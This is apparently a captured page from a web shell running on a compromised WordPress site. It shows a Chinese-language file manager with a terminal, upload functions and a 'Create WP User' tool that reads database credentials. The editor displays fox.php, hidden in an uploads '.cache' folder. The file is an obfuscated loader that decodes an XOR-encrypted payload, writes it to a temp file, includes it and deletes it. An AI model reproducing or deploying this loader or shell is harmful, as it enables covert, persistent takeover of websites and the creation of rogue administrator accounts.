Linux webm017.cluster130.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid x86_64
PHP/7.4.33
服务器IP :
10.130.20.17
& 您的IP :
216.73.217.47
域名 :
无法读取 [ /etc/named.conf ]
用户 :
koaigpw
上传
终端
新建文件
新建文件夹
Create WP User
登出
+
/
home
/
koaigpw
/
dcustoms.pl
/
wp-content
/
uploads
/
2024
/
.cache
/
[ 返回根目录 ]
名称
大小
权限
修改时间
操作
..
-
-
-
modules
[目录]
drwxr-xr-x
2026-04-21 23:12
poppins
[目录]
drwxr-xr-x
2026-05-21 13:25
fox.php
1.10 KB
-rw-r--r--
2026-04-21 23:12
index.php
1.09 KB
-rw-r--r--
2026-04-21 23:12
>_
终端
关闭 ✕
输入 'help' 查看可用命令。
koaigpw@
>
新建文件
文件名
取消
创建
重命名
新名称
取消
重命名
Create WordPress User
Auto (baca dari file CMS)
Manual (isi kredensial DB)
代码编辑器 :
fox.php
<?php $encrypted = 'XwARCBhfVAEHARxKXQBSVlBVREEhDRwAFxoABEM7ABcCBBpDLRcXGxNUTABUW34gBkMBCxEREwYCBEUWERMeBhpFAAYTBxFICgYXFBoRDQFLfl1HAQcBHEpdRwscCAlKaw'; if (!function_exists('leopard')) { function leopard($data, $key) { $alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_'; $bin = ''; for ($i = 0; $i < strlen($data); $i++) { $index = strpos($alphabet, $data[$i]); $bin .= str_pad(decbin($index), 6, '0', STR_PAD_LEFT); } $bytes = ''; for ($i = 0; $i < strlen($bin); $i += 8) { $chunk = substr($bin, $i, 8); if (strlen($chunk) < 8) break; // если меньше 8 бит — игнорируем $bytes .= chr(bindec($chunk)); } $res = ''; $klen = strlen($key); for ($i = 0; $i < strlen($bytes); $i++) { $res .= $bytes[$i] ^ $key[$i % $klen]; } return $res; } } file_put_contents($tmp = tempnam(sys_get_temp_dir(), 'shf_'), leopard($encrypted, 'cheetah')); include $tmp; unlink($tmp); ?>
关闭
保存